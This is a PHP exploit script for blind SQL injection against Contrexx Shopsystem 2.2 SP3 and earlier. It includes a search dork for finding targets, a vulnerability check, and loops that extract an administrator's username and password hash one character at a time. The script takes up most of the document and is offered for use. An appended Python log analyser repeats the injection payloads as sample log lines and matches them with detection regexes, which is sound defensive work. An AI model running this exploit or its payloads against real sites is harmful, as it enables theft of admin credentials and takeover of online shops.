#!/usr/bin/php
<?php
/*
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit written by: Penguin
Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Software price: about 700 CHF
Vendor: http://www.contrexx.com
Found by: Penguin
Version: =< 2.2 SP 3
Dork: inurl:index.php?section=shop&catId=
Vendor: www.contrexx.com
Visit: www.null-sector.info
Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head
*/

echo "#######################################\r\n";
echo "# Contrexx Shopsystem Exploit         #\r\n";
echo "# Exploit Type: Blind SQL Injection   #\r\n";
echo "# Programmed by: Penguin              #\r\n";
echo "# Visit www.null-sector.info          #\r\n";
echo "#######################################\r\n";

if ($argc < 3) {
    echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit)\r\n";
    echo "TARGET_URL = http://demo.de/index.php\r\n";
    echo "CATID = CategoryId (MUST BE VALID!)\r\n";
    echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0\r\n";
    die();
}

// Config Variables
$target_url        = $argv[1] . "?section=shop&catId=" . $argv[2];
$charset_start_usr = 33;   // printable ASCII range tried for each username character
$charset_end_usr   = 126;
$charset_hash      = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); // 0-9, a-f (hex digest)
$toLength          = 100;  // upper bound for the username length search
$myLimit           = isset($argv[3]) ? (int)$argv[3] : 0; // optional third argument, default 0 as stated in the usage

// Functions
function getUsername($toLength, $charset_start, $charset_end, $target_url, $limit)
{
    // Get Length: the category page renders normally only while the injected condition is true
    $length = -1;
    for ($i = 0; $i < $toLength; $i++) {
        $url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i;
        $src = file_get_contents($url);
        if (testIt($src) == true) {
            $length = $i;
            break;
        }
    }
    if ($length == -1) {
        die("There was a problem @ fetching username length :(\r\n");
    }
    echo "Username length: $length !\r\n";

    // Recover the username one position at a time
    $username = "";
    echo "Username: ";
    for ($k = 0; $k < $length; $k++) {
        $charToAdd = "";
        for ($c = $charset_start; $c < $charset_end; $c++) {
            $p = $k + 1; // MySQL substring() positions are 1-based
            $src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)");
            if (testIt($src) == true) {
                $charToAdd = $c;
                break;
            }
        }
        echo chr($charToAdd);          // code of the character that made the condition true
        $username .= chr($charToAdd);
    }
    echo "\r\n";
    return $username;
}

function getHash($toLength, $charset, $target_url, $limit)
{
    // Get Hash: 32 hex characters, same position-by-position comparison as above
    $hash = "";
    echo "Hash: ";
    for ($k = 0; $k < 32; $k++) {
        $charToAdd = "";
        for ($c = 0; $c < count($charset); $c++) {
            $p = $k + 1;
            $z = $charset[$c];
            $src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)");
            if (testIt($src) == true) {
                $charToAdd = $charset[$c];
                break;
            }
        }
        echo chr($charToAdd);
        $hash .= chr($charToAdd);
    }
    echo "\r\n";
    return $hash;
}

function testIt($src)
{
    // A true condition leaves the category page intact, so the product description block is present
    $check = explode("<div class=\"description\">", $src);
    if (count($check) >= 2) {
        return true;
    }
    return false;
}

echo "Starting exploit....\r\nChecking if Vulnerable...";
$check = file_get_contents($target_url . "'");
if (testIt($check) == true) {
    die("Target is not Vulnerable :(\r\n");
}
echo "Target is Vulnerable :)\r\n";
echo "Starting the SQL Injection...\r\n";
echo "Fetching Username...\r\n";
$username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url, $myLimit);
$hash     = getHash($toLength, $charset_hash, $target_url, $myLimit);
echo "Exploited Successfully!\r\n";
echo "Full Logindata: $username : $hash\r\n";
echo "Have fun ;)\r\n";
?>
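From the defender's side, the requests this script sends leave a distinctive shape in the web server access log. The Python below is an added example, not part of the original exploit or of Contrexx: it parses constructed sample log lines (not from a real server) and classifies each catId value by the markers the injection above relies on, namely /**/ in place of whitespace, a subselect after `and`, a `length()` probe and a `substring()=char()` comparison, with the trailing-quote request flagged separately as the vulnerability check.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Constructed sample access-log lines mirroring the request shapes the script above sends
# to catId: a normal request, the trailing-quote check, a length() probe, a char() probe.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2011:13:55:36 +0200] "GET /index.php?section=shop&catId=12 HTTP/1.1" 200 8123
203.0.113.5 - - [10/Oct/2011:13:55:37 +0200] "GET /index.php?section=shop&catId=12%27 HTTP/1.1" 200 4101
203.0.113.5 - - [10/Oct/2011:13:55:38 +0200] "GET /index.php?section=shop&catId=12/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/0,1)=5 HTTP/1.1" 200 8123
203.0.113.5 - - [10/Oct/2011:13:55:39 +0200] "GET /index.php?section=shop&catId=12/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/0,1),1,1)=char(97) HTTP/1.1" 200 8123
"""
# Combined-format request line; only the client IP and the request path are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d+')
# Markers of the blind-injection grammar used above, matched after /**/ is normalised.
SQL_PATTERNS = {
    "subselect_after_and": re.compile(r"\band\b.*\(\s*select\b", re.I),
    "length_probe": re.compile(r"\blength\(\s*\w+\s*\)", re.I),
    "char_compare": re.compile(r"\bsubstring\(.*\)\s*=\s*char\(\d+\)", re.I),
}

def analyse_line(line):
    """Classify one log line by its catId value; None if it has no catId."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    if "catId" not in qs:
        return None
    raw = qs["catId"][0]             # parse_qs has already percent-decoded it
    if raw.isdigit():                # the only shape the application expects
        return {"ip": m.group("ip"), "verdict": "benign", "hits": []}
    hits = ["comment_whitespace"] if "/**/" in raw else []
    norm = raw.replace("/**/", " ")  # undo the comment-as-space trick
    hits += [name for name, rx in SQL_PATTERNS.items() if rx.search(norm)]
    if hits:
        verdict = "attack"
    elif raw.endswith("'"):
        verdict = "probe"            # the script's "is it vulnerable" check
    else:
        verdict = "anomaly"          # non-numeric catId of some other shape
    return {"ip": m.group("ip"), "verdict": verdict, "hits": hits}

def scan_log(text):
    # Return (ip, verdict, hits) for every line that is not benign.
    findings = []
    for line in text.splitlines():
        result = analyse_line(line)
        if result and result["verdict"] != "benign":
            findings.append((result["ip"], result["verdict"], result["hits"]))
    return findings
```

Running scan_log over a real log and grouping findings by IP and time window gives the per-character request bursts that this kind of boolean-based extraction produces, which is the signal worth alerting on.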